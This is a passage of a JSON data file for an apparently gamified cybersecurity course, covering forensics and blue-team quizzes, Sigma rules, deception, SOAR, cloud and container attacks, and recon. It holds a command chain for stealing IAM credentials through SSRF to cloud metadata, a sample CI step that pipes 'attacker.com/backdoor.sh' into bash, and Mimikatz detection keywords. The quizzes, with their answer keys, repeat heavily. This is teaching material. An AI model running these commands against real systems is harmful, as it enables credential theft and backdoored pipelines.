matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"defense-sigma-rules","cat":"Defense & Blue Team","title":"Writing Sigma Detection Rules","diff":3,"xp":200,"intro":"Vendor-neutral detection rules that convert to any SIEM.","sections":[{"type":"text","content":"Sigma is the YARA of log detection: write once, convert to Splunk SPL, Elastic Query, Microsoft KQL, etc. Rules define conditions on log fields to detect attacker techniques."},{"type":"code","lang":"yaml","content":"# Sigma rule: detect Mimikatz execution\ntitle: Mimikatz Execution\nstatus: experimental\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: 'mimikatz.exe'\n        - OriginalFileName: 'mimikatz.exe'\n        - CommandLine|contains:\n            - 'sekurlsa'\n            - 'kerberos::'\n            - 'lsadump::'\n    condition: selection\nfalsepositives:\n    - Security tools that mimic mimikatz names\nlevel: critical"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Sigma rules are valuable because they...","opts":["Only work with Splunk","Convert to any SIEM's query language (vendor-neutral)","Replace YARA","Are simpler than regex"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"defense-deception-advanced","cat":"Defense & Blue Team","title":"Advanced Deception Architecture","diff":4,"xp":250,"intro":"Build a comprehensive deception layer that detects every stage of an attack.","sections":[{"type":"text","content":"Layer deception across the kill chain: honey credentials in memory (detect credential theft), honey shares (detect lateral movement), honey DNS entries (detect enumeration), honey tokens in cloud (detect cloud pivot), and honey documents (detect data access)."},{"type":"code","lang":"bash","content":"# Kill chain deception mapping:\n# Recon: honey DNS entries (any resolution = attacker enumerating)\n# Initial Access: honey email account (login = credential stuffing)\n# Execution: honey PowerShell profile (load = attacker running PS)\n# Persistence: honey scheduled task (creation = installing persistence)\n# Credential Access: honey creds in LSASS (harvest = mimikatz)\n# Lateral Movement: honey shares (access = pivoting)\n# Collection: honey documents (open = data hunting)\n# Exfil: honey AWS keys (API call = exfiltrating to cloud)\n\n# Implementation:\n# CanaryTokens (canarytokens.org) for quick deployment\n# Thinkst Canary for enterprise deception"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Advanced deception covers...","opts":["Only network honeypots","Every stage of the kill chain with different trap types","Only file traps","Only credential traps"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"defense-soc-automation","cat":"Defense & Blue Team","title":"SOC Automation with SOAR","diff":4,"xp":250,"intro":"Automate repetitive SOC tasks: enrichment, containment, and triage.","sections":[{"type":"text","content":"SOAR (Security Orchestration, Automation, and Response) automates: IP reputation lookups, hash checking against VT, user account disabling, host isolation, and ticket creation. Reduces MTTR from hours to seconds."},{"type":"code","lang":"bash","content":"# SOAR playbook: phishing response\n# Trigger: email reported as phishing\n# Step 1 (auto): Extract URLs, attachments, sender\n# Step 2 (auto): Check URLs against VirusTotal, urlscan.io\n# Step 3 (auto): Detonate attachment in sandbox\n# Step 4 (auto): Search SIEM for other recipients\n# Step 5 (auto): If malicious -> quarantine email for all recipients\n# Step 6 (auto): Block sender domain at email gateway\n# Step 7 (auto): If clicked -> isolate endpoint via EDR API\n# Step 8 (auto): Create incident ticket with enrichment\n# Step 9 (human): Review and close"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"SOAR automates SOC workflows to...","opts":["Replace analysts","Reduce response time from hours to seconds for repetitive tasks","Eliminate all threats","Remove the need for SIEM"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cloud-ssrf-chain","cat":"Cloud & Container","title":"Cloud SSRF to Full Account Compromise","diff":4,"xp":300,"intro":"Chain SSRF through cloud metadata to IAM credentials to full account takeover.","sections":[{"type":"text","content":"SSRF to cloud metadata (169.254.169.254) steals the instance's IAM role credentials. Those credentials may have permissions to assume other roles, access secrets, or escalate to admin."},{"type":"code","lang":"bash","content":"# Step 1: SSRF to metadata\ncurl 'https://vuln-app.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'\n# Returns: role-name\ncurl 'https://vuln-app.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name'\n# Returns: AccessKeyId, SecretAccessKey, Token\n\n# Step 2: Use stolen creds\nexport AWS_ACCESS_KEY_ID=ASIA...\nexport AWS_SECRET_ACCESS_KEY=...\nexport AWS_SESSION_TOKEN=...\n\n# Step 3: Enumerate and escalate\naws sts get-caller-identity\npython3 enumerate-iam.py --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY\n# Step 4: Pivot to other services\naws secretsmanager list-secrets\naws s3 ls"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"The SSRF-to-cloud escalation path starts with...","opts":["Port scanning","Stealing IAM credentials from the metadata endpoint","Brute force","Social engineering"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-supply-chain-container","cat":"Cloud & Container","title":"Container Supply Chain Attacks","diff":5,"xp":300,"intro":"Poison base images, inject malicious layers, and compromise CI/CD pipelines.","sections":[{"type":"text","content":"Container supply chain: typosquatting popular images (pythn instead of python), injecting malicious layers in multi-stage builds, compromising CI/CD pipeline to add backdoor steps, and poisoning package managers inside Dockerfiles."},{"type":"code","lang":"bash","content":"# Attack vectors:\n# 1. Typosquatting on Docker Hub\ndocker push evil-pythn:latest  # someone types 'pythn' instead of 'python'\n\n# 2. Compromised base image\n# If the base image is compromised, every image built on it is too\n# Pin to digest instead of tag:\nFROM python@sha256:abc123...  # digest is immutable\n\n# 3. CI/CD pipeline injection\n# If .github/workflows/ is writable, add a step:\n- run: curl attacker.com/backdoor.sh | bash\n\n# 4. Dependency confusion in Dockerfile\n# pip install internal-package  -> attacker registers 'internal-package' on PyPI\n\n# Detection:\n# Scan images: trivy, snyk, grype\ntrivy image myapp:latest"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Container supply chain attacks target...","opts":["Runtime containers","The build process: base images, CI/CD, and dependencies","Network configuration","Kubernetes API"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"r-ping-sweep","cat":"Reconnaissance","title":"Ping Sweep Basics","diff":1,"xp":50,"intro":"Discover live hosts.","sections":[{"type":"text","content":"A ping sweep sends ICMP to a range. Live hosts respond."},{"type":"code","lang":"bash","content":"nmap -sn 192.168.1.0/24"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"nmap -sn does what?","opts":["Port scan","Host discovery","Service detection","Vuln scan"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-dns-records","cat":"Reconnaissance","title":"DNS Record Types","diff":1,"xp":50,"intro":"A, MX, CNAME, TXT \u2014 each reveals different info.","sections":[{"type":"text","content":"DNS maps names to data. A=IPv4, MX=mail, TXT=SPF/DKIM, NS=nameservers."},{"type":"code","lang":"bash","content":"dig example.com A +short\ndig example.com MX +short\ndig example.com TXT"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"MX records handle...","opts":["Web traffic","Email routing","File transfer","DNS"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable 